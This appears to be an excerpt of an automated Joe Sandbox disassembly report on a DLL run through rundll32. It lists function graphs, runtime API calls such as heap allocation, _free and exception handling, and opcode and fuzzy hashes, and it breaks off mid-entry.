                      control_flow_graph 455 6eb0eeae-6eb0eebb call 6eb0b8b2 457 6eb0eec0-6eb0eecb 455->457 458 6eb0eed1-6eb0eed9 457->458 459 6eb0eecd-6eb0eecf 457->459 460 6eb0ef1c-6eb0ef28 call 6eb0b90f 458->460 461 6eb0eedb-6eb0eedf 458->461 459->460 462 6eb0eee1-6eb0ef16 call 6eb0d0de 461->462 467 6eb0ef18-6eb0ef1b 462->467 467->460
                      APIs
                        • Part of subcall function 6EB0B8B2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EB0B46E,00000001,00000364,00000006,000000FF,?,00000001,6EB0B68B,6EB0B935,?,?,6EB0AB0E), ref: 6EB0B8F3
                      • _free.LIBCMT ref: 6EB0EF1D
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: 5f52aec67efb57151ddd9cf007e78782c2d025e2ddda8bab545638a33767c9fe
                      • Instruction ID: ea3ed396f886b26362cc231fc0e862331ba6cba5babd54d0a58a273c0f5b6753
                      • Opcode Fuzzy Hash: 5f52aec67efb57151ddd9cf007e78782c2d025e2ddda8bab545638a33767c9fe
                      • Instruction Fuzzy Hash: 5A01D67261435A6BD7218FA8D8819CEFFA8EB053B0F140669E555A76C0E370B911CBA0

                      Control-flow Graph
                      control_flow_graph 468 6eb0b8b2-6eb0b8bd 469 6eb0b8cb-6eb0b8d1 468->469 470 6eb0b8bf-6eb0b8c9 468->470 472 6eb0b8d3-6eb0b8d4 469->472 473 6eb0b8ea-6eb0b8fb RtlAllocateHeap 469->473 470->469 471 6eb0b8ff-6eb0b90a call 6eb0b686 470->471 477 6eb0b90c-6eb0b90e 471->477 472->473 474 6eb0b8d6-6eb0b8dd call 6eb0e4b3 473->474 475 6eb0b8fd 473->475 474->471 481 6eb0b8df-6eb0b8e8 call 6eb09eaa 474->481 475->477 481->471 481->473
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EB0B46E,00000001,00000364,00000006,000000FF,?,00000001,6EB0B68B,6EB0B935,?,?,6EB0AB0E), ref: 6EB0B8F3
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 277392e33f7e49666117ddc13b38aa083189dca2d5446cd930fd1fea4074c845
                      • Instruction ID: 441194d3ad83f1f5c06f8ba5c368201d4ec87fb118b549307dd66b8d21047020
                      • Opcode Fuzzy Hash: 277392e33f7e49666117ddc13b38aa083189dca2d5446cd930fd1fea4074c845
                      • Instruction Fuzzy Hash: 1EF0BB3111576657EB528ED78C95A8F3F58EF42670B114161D814970ACDB30F40082A0
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EB07294
                      • IsDebuggerPresent.KERNEL32 ref: 6EB07360
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EB07380
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 6EB0738A
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: abcbddf40fd6a522ef06c48b4d7b590712fcbc4b3788a9c4cb8d4c3bcad8f256
                      • Instruction ID: 1c656878e5f2da9a067285736913b8d0da80496f056099db5c0423f30d34d905
                      • Opcode Fuzzy Hash: abcbddf40fd6a522ef06c48b4d7b590712fcbc4b3788a9c4cb8d4c3bcad8f256
                      • Instruction Fuzzy Hash: E8311AB5D15229DBDB10DFA4C9897CDBBB8AF08304F1041DAE409A7280EBB45A85CF44
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EB09918
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EB09922
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EB0992F
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: bd728c4801c2d791da964c47c8862359abdfe4ab73a60545249a1f0a1d745c78
                      • Instruction ID: c5709475d94b99dceaf0a4850a04ec646fe16334bf8784b34af9fbc924cf4fb0
                      • Opcode Fuzzy Hash: bd728c4801c2d791da964c47c8862359abdfe4ab73a60545249a1f0a1d745c78
                      • Instruction Fuzzy Hash: 2A31E8749112299BCF61DF64C989BCCBBB8FF48310F5041DAE41CA7290E774AB858F44
                      APIs
                      • GetCurrentProcess.KERNEL32(?,?,6EB0A253,?,00000001,?,?), ref: 6EB0A276
                      • TerminateProcess.KERNEL32(00000000,?,6EB0A253,?,00000001,?,?), ref: 6EB0A27D
                      • ExitProcess.KERNEL32 ref: 6EB0A28F
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: 3c9e60628fa19677db4d90d0b41d1ec4c5283912388006b7507eeb84de19628a
                      • Instruction ID: ceb6f97b28c846d5673eced0566fe34fb5511e8bdd1d87686f31bd21e82c5316
                      • Opcode Fuzzy Hash: 3c9e60628fa19677db4d90d0b41d1ec4c5283912388006b7507eeb84de19628a
                      • Instruction Fuzzy Hash: 73E0E631421545EFCF516F94C85DA8C7F69FB55651B014824F4058B535CB36E981DF90
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6EB11AAC,?,?,00000008,?,?,6EB11744,00000000), ref: 6EB11CDE
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: f20dcca05249fa8a041eb184641bf255b308874648c9cc6a840bdc3aacd1def3
                      • Instruction ID: b917520fee106e778f8f72189705429581090fa0e9e99cf9d11be3ecf69d6835
                      • Opcode Fuzzy Hash: f20dcca05249fa8a041eb184641bf255b308874648c9cc6a840bdc3aacd1def3
                      • Instruction Fuzzy Hash: 44B15531224649CFD745CF68C496BA57FA0FF15364F298698E8E9CF2A1C335E986CB40
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6EB070BD
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      • Opcode ID: 2755254e9dc94bccce2c433ddbb50ea44eb18e63434be3b2c7e9d90f6be2c65b
                      • Instruction ID: fd12ae1faaaa1730b947db1d7e110333f03e66303b8399ffe031909fcaa4079b
                      • Opcode Fuzzy Hash: 2755254e9dc94bccce2c433ddbb50ea44eb18e63434be3b2c7e9d90f6be2c65b
                      • Instruction Fuzzy Hash: 855149B1A10B568BDB04DF95C49679ABFF0EB45360F20C46AD515EB680D3B4A940CF60
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 660cfadff491239c4e3264276f3a099958887481dbc097168be0c2d84056ed39
                      • Instruction ID: 7f4260ebe5ecdd0bbf43cbb908b86d04cde30e9909ad435a2b738c810bad5b93
                      • Opcode Fuzzy Hash: 660cfadff491239c4e3264276f3a099958887481dbc097168be0c2d84056ed39
                      • Instruction Fuzzy Hash: 5D41ADB1814259AEDB50CFA9CCD8AEEBFB8EF45304F1446D9E41DE3214DA34AE848F50
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 8717babdb95e310683b30a008783ffee452774299d9cf5445523185dc5fe7ce5
                      • Instruction ID: 60940b5c9bb960b910cf86e94d9dc8a22c9d4ae7e6cd404ca03303839927007a
                      • Opcode Fuzzy Hash: 8717babdb95e310683b30a008783ffee452774299d9cf5445523185dc5fe7ce5
                      • Instruction Fuzzy Hash: EEA00274A11A01CF9F408F75862B38E3AE9BEBF6F27259179E409C7955EB348460EB01
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
                      • Instruction ID: 0b1b1411b2738ecb05b891e4ae5b0c5dcb5d8244eff7faaf3a26b629e0c714bb
                      • Opcode Fuzzy Hash: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
                      • Instruction Fuzzy Hash: 5BE08C32A21268EBCB15CBD8C980A8EBBECEB44B10B1145A6F511D3214C270EE04CBD0
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 6EB0DE34
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E24D
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E25F
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E271
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E283
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E295
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E2A7
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E2B9
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E2CB
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E2DD
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E2EF
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E301
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E313
                        • Part of subcall function 6EB0E230: _free.LIBCMT ref: 6EB0E325
                      • _free.LIBCMT ref: 6EB0DE29
                        • Part of subcall function 6EB0B90F: HeapFree.KERNEL32(00000000,00000000,?,6EB0AB0E), ref: 6EB0B925
                        • Part of subcall function 6EB0B90F: GetLastError.KERNEL32(?,?,6EB0AB0E), ref: 6EB0B937
                      • _free.LIBCMT ref: 6EB0DE4B
                      • _free.LIBCMT ref: 6EB0DE60
                      • _free.LIBCMT ref: 6EB0DE6B
                      • _free.LIBCMT ref: 6EB0DE8D
                      • _free.LIBCMT ref: 6EB0DEA0
                      • _free.LIBCMT ref: 6EB0DEAE
                      • _free.LIBCMT ref: 6EB0DEB9
                      • _free.LIBCMT ref: 6EB0DEF1
                      • _free.LIBCMT ref: 6EB0DEF8
                      • _free.LIBCMT ref: 6EB0DF15
                      • _free.LIBCMT ref: 6EB0DF2D
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 289a0bdf664b5a91976db207c72ae6a085b0b7f6a1cee6051f52e34d07348cbd
                      • Instruction ID: 9fec6bfeae3b964eb27e72d84acb22a48eddee465f93d54acd55928aa0dba300
                      • Opcode Fuzzy Hash: 289a0bdf664b5a91976db207c72ae6a085b0b7f6a1cee6051f52e34d07348cbd
                      • Instruction Fuzzy Hash: FD314A716242859FEF619AB4EC84B9A7FE8EF01354F109829E495D7198DB30F9508A20
                      APIs
                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6EB083BD
                      • type_info::operator==.LIBVCRUNTIME ref: 6EB083DF
                      • ___TypeMatch.LIBVCRUNTIME ref: 6EB084EE
                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6EB085C0
                      • _UnwindNestedFrames.LIBCMT ref: 6EB08644
                      • CallUnexpected.LIBVCRUNTIME ref: 6EB0865F
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2123188842-393685449
                      • Opcode ID: 7319352720694bcb0ac622968f33e8aa391fda261d87fb3d215609b31ab21b08
                      • Instruction ID: 812e0fd2ee607008f695da1b37a606d0f2639c5811e37dc461ffb78ee53896ec
                      • Opcode Fuzzy Hash: 7319352720694bcb0ac622968f33e8aa391fda261d87fb3d215609b31ab21b08
                      • Instruction Fuzzy Hash: 22B1747181029AEFCF05DFE4D88099EBFB9FF44324B10856AE8146B211D771EA62CF91
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: c036b6b94e4bd38e3cdecacbafebaff441c65364be520d290f13e8addb581f80
                      • Instruction ID: b6bd2119dcfd85b9f8807f17e8d65334591bfcda4fdf6fc00a6a49b1b76aa829
                      • Opcode Fuzzy Hash: c036b6b94e4bd38e3cdecacbafebaff441c65364be520d290f13e8addb581f80
                      • Instruction Fuzzy Hash: 4821947692414CAFCF51EFE4C880EDE7FB9AF08344F0149A6E5659B125EB31EB448B80
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 6EB07C47
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6EB07C4F
                      • _ValidateLocalCookies.LIBCMT ref: 6EB07CD8
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6EB07D03
                      • _ValidateLocalCookies.LIBCMT ref: 6EB07D58
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: c0dd08dc3f18af68791d607c18deb68b142552a0ca7544daf9622de31752b802
                      • Instruction ID: e8851a1b1e567d377dfbe8c592cc6451f95b031d43994da386326309ced19145
                      • Opcode Fuzzy Hash: c0dd08dc3f18af68791d607c18deb68b142552a0ca7544daf9622de31752b802
                      • Instruction Fuzzy Hash: 4341E434A10199ABCF10EFA8C854ADEFFB5FF45328F108595E8145B395D7B1BA11CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID:
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 0-537541572
                      • Opcode ID: ffb0bac61f9daa99771753beb69bb4c20e2dfabfcff6c4c05658b4c02e2a0acd
                      • Instruction ID: fdcf33e4a48db0c30669cdf978e46ab5d79900be1d69497864c8a17691f12af9
                      • Opcode Fuzzy Hash: ffb0bac61f9daa99771753beb69bb4c20e2dfabfcff6c4c05658b4c02e2a0acd
                      • Instruction Fuzzy Hash: 6121F332B55661EBCB118AE9AC85B8B3F69EB027B0F110514E916EF685D730F800CAF0
                      APIs
                        • Part of subcall function 6EB0E397: _free.LIBCMT ref: 6EB0E3BC
                      • _free.LIBCMT ref: 6EB0E41D
                        • Part of subcall function 6EB0B90F: HeapFree.KERNEL32(00000000,00000000,?,6EB0AB0E), ref: 6EB0B925
                        • Part of subcall function 6EB0B90F: GetLastError.KERNEL32(?,?,6EB0AB0E), ref: 6EB0B937
                      • _free.LIBCMT ref: 6EB0E428
                      • _free.LIBCMT ref: 6EB0E433
                      • _free.LIBCMT ref: 6EB0E487
                      • _free.LIBCMT ref: 6EB0E492
                      • _free.LIBCMT ref: 6EB0E49D
                      • _free.LIBCMT ref: 6EB0E4A8
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
                      • Instruction ID: ab3b070aa7b59f22fa54655f1d59ad397c529eb81970f738f64a02615da9dec9
                      • Opcode Fuzzy Hash: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
                      • Instruction Fuzzy Hash: 3A112B71974B88AEDE32ABF0CD45FCF7F9CAF04708F404C1AA299A6094DB75FA148650
                      APIs
                      • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6EB0F2A4
                      • __fassign.LIBCMT ref: 6EB0F489
                      • __fassign.LIBCMT ref: 6EB0F4A6
                      • WriteFile.KERNEL32(?,6EB0D927,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EB0F4EE
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EB0F52E
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EB0F5D6
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                      • String ID:
                      • API String ID: 1735259414-0
                      • Opcode ID: 515eb233285ee3d760550337654c974ed4d0c3ec8f00382ed3c3b208417cb24a
                      • Instruction ID: 30de65cb30eb0c5ecb9e399116e7665f440a4c1cc0b1ccb5bd106372f2cc132f
                      • Opcode Fuzzy Hash: 515eb233285ee3d760550337654c974ed4d0c3ec8f00382ed3c3b208417cb24a
                      • Instruction Fuzzy Hash: 4CC18B75E002999FCB15CFE8C8909EDBFB9FF49324F28416AE855B7241D631A902CF64
                      APIs
                      • GetLastError.KERNEL32(00000001,?,6EB07B9E,6EB068B4,6EB06D4B,?,6EB06F85,?,00000001,?,?,00000001,?,6EB1C7F8,0000000C,6EB0707E), ref: 6EB07F97
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EB07FA5
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EB07FBE
                      • SetLastError.KERNEL32(00000000,6EB06F85,?,00000001,?,?,00000001,?,6EB1C7F8,0000000C,6EB0707E,?,00000001,?), ref: 6EB08010
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219960706.000000006EB1E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219980092.000000006EB20000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6eb00000_rundll32.jbxd
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: f707b4d0485f6a2d1580ebfd60f948c130fc54423b10197d553defc463fa6b61
                      • Instruction ID: a52f47ce22b4576bdf943a83dcb86df6536ef896e3aaf36ae5b113272caa29b1
                      • Opcode Fuzzy Hash: f707b4d0485f6a2d1580ebfd60f948c130fc54423b10197d553defc463fa6b61
                      • Instruction Fuzzy Hash: 5501D83332D6A3AD9A6156F45C9E69F3E58DB527797200B3DF120864D4EF51A8016540
                      Strings
                      • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6EB0C180
                      Memory Dump Source
                      • Source File: 00000007.00000002.3219910076.000000006EB01000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EB00000, based on PE: true
                      • Associated: 00000007.00000002.3219895075.000000006EB00000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000007.00000002.3219931084.000000006EB16000.00000002.00000001.01000000.00000003.sdmp
